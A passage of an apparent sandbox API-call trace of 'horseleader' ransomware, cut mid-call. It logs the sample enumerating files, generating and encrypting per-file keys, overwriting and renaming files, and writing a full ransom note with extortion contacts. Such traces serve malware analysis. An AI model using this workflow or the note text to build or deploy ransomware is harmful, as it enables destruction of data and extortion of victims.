lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x82c7, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0248.102] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.102] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\#Decrypt#.txt") returned 82 [0248.102] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.103] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0248.103] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.105] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.105] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.105] CloseHandle (hObject=0x158) returned 1 [0248.105] GetProcessHeap () returned 0x780000 [0248.105] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0248.105] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="STUDIO", cAlternateFileName="")) returned 1 [0248.105] lstrcmpiW (lpString1="STUDIO", lpString2="Windows") returned -1 [0248.105] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO") returned 66 [0248.105] lstrcmpW (lpString1="STUDIO", lpString2=".") returned 1 [0248.105] lstrcmpW (lpString1="STUDIO", lpString2="..") returned 1 [0248.105] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.105] GetProcessHeap () returned 0x780000 [0248.105] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.105] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\*") returned 68 [0248.105] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.106] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.106] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\.") returned 68 [0248.106] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.106] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.106] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.106] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\..") returned 69 [0248.106] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.106] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.106] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a71ef90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x68b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0248.106] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0248.106] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 78 [0248.106] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0248.106] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0248.106] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0248.106] lstrlenW (lpString=".testttjffg") returned 11 [0248.106] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0248.107] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.107] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.107] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.108] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 78 [0248.108] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0248.108] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1675) returned 1 [0248.108] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x68b, lpOverlapped=0x0) returned 1 [0248.110] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff975, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.110] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x68b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x68b, lpOverlapped=0x0) returned 1 [0248.111] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.111] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.111] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.111] CloseHandle (hObject=0x1a4) returned 1 [0248.111] GetProcessHeap () returned 0x780000 [0248.111] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.111] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.horseleader") returned 90 [0248.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif.horseleader")) returned 1 [0248.112] GetProcessHeap () returned 0x780000 [0248.112] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.112] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e493a00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5ac7a110, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2e493a00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xbfed, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="STUDIO.ELM", cAlternateFileName="")) returned 1 [0248.112] lstrcmpiW (lpString1="STUDIO.ELM", lpString2="Windows") returned -1 [0248.112] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM") returned 77 [0248.112] StrStrIW (lpFirst="STUDIO.ELM", lpSrch=".horseleader") returned 0x0 [0248.112] lstrcmpW (lpString1="STUDIO.ELM", lpString2="#Decrypt#.txt") returned 1 [0248.113] lstrcmpW (lpString1="STUDIO.ELM", lpString2="_uninstalling_.png") returned 1 [0248.113] lstrlenW (lpString=".testttjffg") returned 11 [0248.113] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM", lpSrch=".testttjffg") returned 0x0 [0248.113] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.113] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.113] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\studio.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.115] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM") returned 77 [0248.115] StrStrW (lpFirst="STUDIO.ELM", lpSrch=".txt") returned 0x0 [0248.115] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=49133) returned 1 [0248.116] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.118] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.118] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.119] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.119] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.119] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.120] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1fed, lpOverlapped=0x0) returned 1 [0248.120] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe013, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.120] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1fed, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1fed, lpOverlapped=0x0) returned 1 [0248.120] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.120] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.120] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.121] CloseHandle (hObject=0x1a4) returned 1 [0248.121] GetProcessHeap () returned 0x780000 [0248.121] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.121] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM.horseleader") returned 89 [0248.121] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\studio.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\studio.elm.horseleader")) returned 1 [0248.124] GetProcessHeap () returned 0x780000 [0248.124] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.124] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d416d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="STUDIO.INF", cAlternateFileName="")) returned 1 [0248.124] lstrcmpiW (lpString1="STUDIO.INF", lpString2="Windows") returned -1 [0248.124] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF") returned 77 [0248.124] StrStrIW (lpFirst="STUDIO.INF", lpSrch=".horseleader") returned 0x0 [0248.124] lstrcmpW (lpString1="STUDIO.INF", lpString2="#Decrypt#.txt") returned 1 [0248.124] lstrcmpW (lpString1="STUDIO.INF", lpString2="_uninstalling_.png") returned 1 [0248.124] lstrlenW (lpString=".testttjffg") returned 11 [0248.125] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF", lpSrch=".testttjffg") returned 0x0 [0248.125] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.125] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.125] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\studio.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.129] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF") returned 77 [0248.129] StrStrW (lpFirst="STUDIO.INF", lpSrch=".txt") returned 0x0 [0248.129] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=578) returned 1 [0248.129] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x242, lpOverlapped=0x0) returned 1 [0248.131] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdbe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.131] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x242, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x242, lpOverlapped=0x0) returned 1 [0248.131] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.131] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.131] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.131] CloseHandle (hObject=0x1a4) returned 1 [0248.131] GetProcessHeap () returned 0x780000 [0248.131] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.132] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF.horseleader") returned 89 [0248.132] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\studio.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\studio.inf.horseleader")) returned 1 [0248.133] GetProcessHeap () returned 0x780000 [0248.133] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.133] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x47cc, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0248.133] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0248.133] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 79 [0248.133] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0248.134] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0248.134] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0248.134] lstrlenW (lpString=".testttjffg") returned 11 [0248.134] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0248.134] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.134] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 